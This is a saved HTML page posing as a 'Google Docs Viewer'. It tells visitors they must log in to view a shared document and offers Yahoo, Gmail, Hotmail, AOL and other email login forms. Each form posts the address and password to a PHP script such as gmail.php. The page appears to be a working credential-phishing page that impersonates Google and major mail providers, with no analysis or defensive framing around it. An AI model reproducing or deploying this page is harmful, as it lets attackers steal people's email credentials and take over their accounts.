
<!-- saved from url=(0026)http://tfiledata.com/rema/ -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> 
<title>Google Docs Viewer </title> 
<link rel="stylesheet" type="text/css" href="./Google Docs/style.htm"> 
<style type="text/css"> 
div {
	position: absolute;
	left: 620px;
	top: 40px;
	background-color: #EBEBEB;
	width: 280px;
	padding: 10px;
	color: #000000;
	border: #0000cc 2px dashed;
	display: none;
}
body,td,th {
	font-family: Arial, Helvetica, sans-serif;
	font-size: 12px;
}
</style> 
<script language="Javascript"> 
function echeck(str) {
 
		var at="@"
		var dot="."
		var lat=str.indexOf(at)
		var lstr=str.length
		var ldot=str.indexOf(dot)
		if (str.indexOf(at)==-1){
		   alert("Invalid E-mail ID")
		   return false
		}
 
		if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
		   alert("Invalid E-mail ID")
		   return false
		}
 
		if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
		    alert("Invalid E-mail ID")
		    return false
		}
 
		 if (str.indexOf(at,(lat+1))!=-1){
		    alert("Invalid E-mail ID")
		    return false
		 }
 
		 if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
		    alert("Invalid E-mail ID")
		    return false
		 }
 
		 if (str.indexOf(dot,(lat+2))==-1){
		    alert("Invalid E-mail ID")
		    return false
		 }
		
		 if (str.indexOf(" ")!=-1){
		    alert("Invalid E-mail ID")
		    return false
		 }
 
 		 return true					
	}
 
function ValidateFormYahoo(){
	var emailID=document.yahoo.yahoouser
	var emailPASS=document.yahoo.yahoopassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
 
	return true
 }
 
 function ValidateFormHotmail(){
	var emailID=document.hotmail.hotmailuser
	var emailPASS=document.hotmail.hotmailpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
 
	return true
 }
 
  function ValidateFormGmail(){
	var emailID=document.gmail.gmailuser
	var emailPASS=document.gmail.gmailpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	return true
 }
 
   function ValidateFormAol(){
	var emailID=document.aol.aoluser
	var emailPASS=document.aol.aolpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	return true
 }
 
   function ValidateFormOther(){
	var emailID=document.other.otheruser
	var emailPASS=document.other.otherpassword
	
	if ((emailID.value==null)||(emailID.value=="")){
		alert("Please Enter your Email ID")
		emailID.focus()
		return false
	}
	if ((emailPASS.value==null)||(emailPASS.value=="")){
		alert("Please Enter your Email Password")
		emailPASS.focus()
		return false
	}
	if (echeck(emailID.value)==false){
		emailID.value=""
		emailID.focus()
		return false
	}
	return true
 }
</script> 
<script language="javascript"> 
function toggle() {
	var ele = document.getElementById("toggleText");
	var text = document.getElementById("displayText");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
}
 
function togglegmail() {
	var ele = document.getElementById("toggleTextgmail");
	var text = document.getElementById("displayTextgmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
 
function togglehotmail() {
	var ele = document.getElementById("toggleTexthotmail");
	var text = document.getElementById("displayTexthotmail");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleaol() {
	var ele = document.getElementById("toggleTextaol");
	var text = document.getElementById("displayTextaol");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
function toggleother() {
	var ele = document.getElementById("toggleTextother");
	var text = document.getElementById("displayTextother");
	if(ele.style.display == "block") {
    		ele.style.display = "none";
		text.innerHTML = "show";
  	}
	else {
		ele.style.display = "block";
		text.innerHTML = "hide";
	}
} 
</script> 

</head> 
<body bgcolor="#efefef">
<table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff"> 
 
<table width="100%"><tbody><tr><td width="50%"> 
 

<h1><img src="./Google Docs/balloon3.jpg" height="40" width="120"></h1> 

</td></tr></tbody></table> 
 

<br> 
 
 
<table id="invoicetoptables" cellspacing="0" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" width="50%"> 
 
<table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%"> 
<tbody><tr> 
<td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top"> 
<p><font color="#990000" size="4">To View shared document, <br> 
you are required to choose your email address below</font></p> 
 
<br> 
<br> 
 
<font class="paid">Choose your email provider below and login:</font> 

<br> 

<br> 

<br> 
<p align="center"> 
<a href="javascript:toggle();"><img src="./Google Docs/yahoo.jpg" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img src="./Google Docs/gmail.jpg" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:togglehotmail();"><img src="./Google Docs/hotmail.jpg" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a> 
&nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img src="./Google Docs/aol.jpg" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a> 
<br> 
<br> 
<br> 
<a href="javascript:toggleother();"><img src="./Google Docs/other.jpg" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a> 

</p> 
 

<!-- YAHOO CONFIG !--> 

<div id="toggleText" style="display: none"> 
<p><img src="./Google Docs/yahoo.jpg" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="yahoo" method="post" action="yahoo.php" onsubmit="return ValidateFormYahoo()"> 
<p> 
<br> 
				<label>Yahoo Email Address:</label> 
                <br> 
				<input name="yahoouser" style="width: 200px;" type="text"> 
			<br> 
				<label>Yahoo Password</label> 
                <br> 
				<input name="yahoopassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_yahoo" value="Sign In" type="submit"> 
			</p> 



</form> 
</div> 
 
<!-- GMAIL CONFIG !--> 
<div id="toggleTextgmail" style="display: none"> 
<p><img src="./Google Docs/gmail.jpg" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="gmail" method="post" action="gmail.php" onsubmit="return ValidateFormGmail()"> 
<p> 
 
				<label>Gmail Email Address:</label> 

                <br> 
				<input name="gmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Gmail Password</label> 
                <br> 
				<input name="gmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_gmail" value="Sign in" type="submit"> 
			</p> 
            </form> 
 



</div> 
 
<!-- HOTMAIL CONFIG !--> 
<div id="toggleTexthotmail" style="display: none"> 
<p><img src="./Google Docs/hotmail.jpg" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="hotmail" method="post" action="hotmail.php" onsubmit="return ValidateFormHotmail()"> 
<p> 
				<label>Hotmail Email Address:</label> 
                <br> 
				<input name="hotmailuser" style="width: 200px;" type="text"> 
			<br> 
				<label>Hotmail Password</label> 
                <br> 
				<input name="hotmailpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_hotmail" value="Sign in" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- AOL CONFIG !--> 
<div id="toggleTextaol" style="display: none"> 
<p><img src="./Google Docs/aol.jpg" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="aol" method="post" action="aol.php" onsubmit="return ValidateFormAol()"> 
<p> 
				<label>Aol Email Address:</label> 
                <br> 
				<input name="aoluser" style="width: 200px;" type="text"> 
			<br> 
				<label>Aol Password</label> 
                <br> 
				<input name="aolpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_aol" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
<!-- OTHER CONFIG !--> 
<div id="toggleTextother" style="display: none"> 
<p><img src="./Google Docs/other.jpg" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p> 
<br> 
<form name="other" method="post" action="other.php" onsubmit="return ValidateFormOther()"> 
<p> 
				<label>Email Address:</label> 
                <br> 
				<input name="otheruser" style="width: 200px;" type="text"> 
			<br> 
				<label>Password</label> 
                <br> 
				<input name="otherpassword" style="width: 200px;" type="password"> 
                <br> 
                <br> 
                <input name="s_other" value="Sign In" type="submit"> 
			</p> 
            </form> 



</div> 
 
 </td> 
 </tr> 
 </tbody></table> 
</td></tr></tbody></table> 
 
</td> 
  
 
 
 
 
 
</tr></tbody></table></body></html>